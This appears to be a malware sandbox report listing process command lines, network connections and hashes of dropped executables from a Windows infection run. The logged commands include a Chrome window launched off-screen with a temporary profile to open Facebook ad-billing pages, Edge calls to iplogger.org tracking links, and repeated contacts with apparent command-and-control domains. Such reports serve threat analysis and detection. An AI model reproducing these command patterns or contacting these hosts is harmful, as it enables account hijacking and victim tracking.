"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf733cc40,0x7ffdf733cc4c,0x7ffdf733cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --field-trial-handle=2140,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --field-trial-handle=2244,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rxTe7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfac246f8,0x7ffdfac24708,0x7ffdfac24718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3532,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3556 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3584,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3688 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1348 -ip 1348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1192

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

"{path}"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rzm87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfac246f8,0x7ffdfac24708,0x7ffdfac24718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4768 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4940,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=924 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 98.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 www.cncode.pw udp
US 34.211.97.45:80 www.cncode.pw tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 www.wsfsd33sdfer.com udp
US 8.8.8.8:53 45.97.211.34.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
HK 101.36.107.74:80 N/A tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 is.gd udp
US 104.25.234.53:443 is.gd tcp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.151.35:443 www.facebook.com tcp
US 8.8.8.8:53 53.234.25.104.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.21:443 bitbucket.org tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 21.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 104.26.2.46:443 iplogger.org tcp
N/A 224.0.0.251:5353 N/A udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 uehge4g6gh.2ihsfa.com udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 146.54.223.76.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 www.fddnice.pw udp
US 54.244.188.177:80 www.fddnice.pw tcp
US 8.8.8.8:53 177.188.244.54.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 secure.facebook.com udp
GB 163.70.147.35:443 www.facebook.com tcp
GB 163.70.147.35:443 www.facebook.com tcp
GB 163.70.151.14:443 secure.facebook.com tcp
GB 163.70.147.35:443 www.facebook.com udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 14.151.70.163.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net udp
GB 163.70.151.21:443 static.xx.fbcdn.net udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 172.217.16.234:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
GB 163.70.151.35:443 facebook.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
GB 163.70.151.35:443 facebook.com udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 N/A tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.126.244.207:8080 N/A tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 N/A tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 104.209.201.84.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 N/A tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 N/A tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 N/A tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\file_clu.exe

MD5 ec8866c33b44b2e1e84248220ab66d0a
SHA1 07025a834eff898dc14555ec821dcc543d9ee654
SHA256 50e87075abe81f2accb11006aacff87513b8998a8be78721257767cb3c04930c
SHA512 323279e425059c43433d29de60c07d71cc4469164e41bf5211e4787a0949955469270a1a998f60156538b943204af3fe4b5eeeadea38d2c5d655c65a52774ede

C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe

MD5 bbe815cb088b8f5a20c6b29313b87ca3
SHA1 92cffb9ab221fd3eea757a90593d3d035de9c152
SHA256 919c8403de9b81f4ca2cd3b6aa96bc7f778d7f1472b547fcc6c6e12ff373ce69
SHA512 5849e5900f32178e55b9c234bba30d7f9c6619c80ad37b07310796807f3e7322ec10db62afebe610fc1092867921a0788d403bf4c31a15e8c650bd4cb108654f

C:\Users\Admin\AppData\Local\Temp\asj.exe

MD5 4ab590bec37edc62624775803da478c4
SHA1 b8388887db2d3a1ac846107e209bfd81007c5633
SHA256 a72c59af764b96223658f375a7622a78a422af6381a5fb746e870043b0d20dda
SHA512 b686081b73c053843febdceca215ea0a11f55090af7240454919168f564a38785b5d94c8d40598e7d629b7e03e13089e24a7beb0a6748cd02ee6192b8a28f0e4

memory/3404-47-0x0000000000360000-0x00000000003EA000-memory.dmp

memory/1348-46-0x0000000000400000-0x0000000000580000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\secd.exe

MD5 89c7d9d506e2d2ad1e86df5dfe5d318f
SHA1 c6b59a79d5926fd3b5d7f292a134290f9d4984a9
SHA256 ba79703eaeddefc846a71a9f3fd9a65c036725f2bc8959dec4f564ed68373aca
SHA512 82220ce0d0e7df3078f299ce56afc7d8e4b24804e9bc03e4bc753619d9f2e92c34f2a3d492f9fd22428ecac3358be2853c92f1ba38f57dfc5c063ac2e38f151b

C:\Users\Admin\AppData\Local\Temp\cld.exe

MD5 749227d9d9f16b8129f3449540dda022
SHA1 9a3bb6c18ce59134671c1871172d78d7ee1947bf
SHA256 9b853f186383e7e201c978a76857d60180b279b308d633b4b078669473b7de51
SHA512 45b7f36f4e01263ba0681cae614e3ab32b12d19a816e6003a37ff6905af34e221bb42edf95cdef00357c3d83248a3cef976e22a21b01638cdd1e161ef18db3d0

C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe

MD5 fa8aff97902b0cfd09cee92a6646c442
SHA1 3d224398f7e101b578949a8cee39142e19586a2a
SHA256 b2c316e8fbbd4061a11f02ee491188eb0e7a2cf86377ae5dd629d4e49c372dcc
SHA512 a4ed99ee8b65133f95dc59fd800dca65266a5fbafe9e37024a4576382aa261f749e7f57354981c3738c3a1a0338b09188c0c031adf2c375b218942b0b02d2d76

C:\Users\Admin\AppData\Local\Temp\piz.exe

MD5 310e87af0b8f40379bed1095dd7372b9
SHA1 1ec32c123ddd840afe605dd737e014bd88c81729
SHA256 a030bb0e1fbe87049fc34c6ae53be0b6e3fb0176c560abddce3cfe95ac14671e
SHA512 a050d7333bca926fd2651374e81dc6dd031a88a0b60375324d5298f6e876aa8d73593089729e015ba10f14eac8375fbbac713aaf1029438240943f8b1980bc96

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 9a33e86a442033fb91f30257650fa530
SHA1 fb435f8a0fa371f8cf21b856fda02783dab16ed9
SHA256 87b42afa55daa0eb8d43daa9f39fa08711aca0fddf1a1c522750611c1fa19852
SHA512 0301d143bd3584fc9dca958fa62f018438f59e0158b55e47e69f709bfdf6e4f066b2e42b8ad4c0cdc2698366a066edd0f75c78fcd68d806a88cca36885bf7176

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

MD5 a4e461c7f3a7c8ed80168346e5f7b41c
SHA1 d618ef96903475a1c293546072fb1f80c7d5d334
SHA256 530af4a5976975c677d10507bcbe82d9a9a0b79a6576a4cfed87f08b828d756c
SHA512 82649dbbd2f003904d1b6b4f0363f3ea29113a0f95705b1346d1086ce35370976abf154043674686c90828a25e107ffd3a9c8219a643992b1337aa1282993494

C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe

MD5 62b0362a4fc3a80879781d59186c0d98
SHA1 a121775fa01f85b84f8c2cddc8002272fb4dedb9
SHA256 77f7155b68c505ffc34d80a20bc5e68292017f1a04e39eec1ca75931d32ae02a
SHA512 5cdff373b7d03dd0774c739f692f211595b950a2f3345acea5575345331f01221e42265451b5d642f74d384b66cb55d15643e390928fce6b3cfd189b42320393

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

memory/2280-111-0x0000000000FB0000-0x000000000105A000-memory.dmp

memory/1760-72-0x0000000000400000-0x00000000006BF000-memory.dmp

memory/2712-117-0x0000000000400000-0x000000000045B000-memory.dmp

memory/2280-129-0x00000000059C0000-0x0000000005A52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe

MD5 051e0cb61c4ef9db71b28dceefca1898
SHA1 bc1e5e91ea898e304c9e6d64d1d92bb56e0c2d8d
SHA256 1913bf1290328462ddca77ae02828a130f810e3ae32f3c2051fe916c22d686a8
SHA512 7575cdc0a78fe9d59032c4e2b70c4f275e0aebaa0e864cbdc6be057dc44256ff3c5f0031be1b164631850b68043ad6ef220d0865be59398acd080aa58ad43858

memory/2280-128-0x0000000005F70000-0x0000000006514000-memory.dmp

memory/3484-130-0x0000000140000000-0x0000000140792000-memory.dmp

memory/2280-131-0x0000000005910000-0x000000000591A000-memory.dmp

memory/1760-142-0x0000000003D80000-0x0000000003D90000-memory.dmp

memory/1760-135-0x0000000003A20000-0x0000000003A30000-memory.dmp

memory/1760-154-0x0000000004670000-0x0000000004678000-memory.dmp

memory/1760-155-0x0000000004690000-0x0000000004698000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ba6ef346187b40694d493da98d5da979
SHA1 643c15bec043f8673943885199bb06cd1652ee37
SHA256 d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73
SHA512 2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

memory/1760-163-0x0000000004730000-0x0000000004738000-memory.dmp

memory/1760-166-0x0000000004870000-0x0000000004878000-memory.dmp

memory/1760-167-0x0000000004890000-0x0000000004898000-memory.dmp

memory/2280-168-0x0000000008600000-0x000000000860A000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 8c945155659e25a00131567bcbc04e05
SHA1 60a22b4a4a43d35187c3e2511c97e825ecc1f74c
SHA256 0df7923ab77b7a518309708a1730bc76741f136794713604473f63ea67c7a196
SHA512 f3784684f5de7cd2bb4c282ef017ad7dc43a4e36659d1e3424fa683c1d309cbcda61fa3f202e697796389fad97ed74b13753c8ca426f57d65a6634365b68662e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 f28c7810b2f8d8b71ccd011b10b0d5f8
SHA1 e47dde777660de276e64633f320889ba67cb3269
SHA256 980542105636f106519e61bd07ab7ad41f1f4ed7fbd515f63ac4128af264cf97
SHA512 4aa12d14c67caa9b6abc588c948d92b9f32f648ebf4351538db3e84edad4e95f13b1ec730756ba8c7c0ca2871318a37d897c393435ff93d9d065260e86e9ce2b

memory/1760-177-0x0000000004B80000-0x0000000004B88000-memory.dmp

memory/1760-175-0x0000000004C80000-0x0000000004C88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

MD5 b7161c0845a64ff6d7345b67ff97f3b0
SHA1 d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256 fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
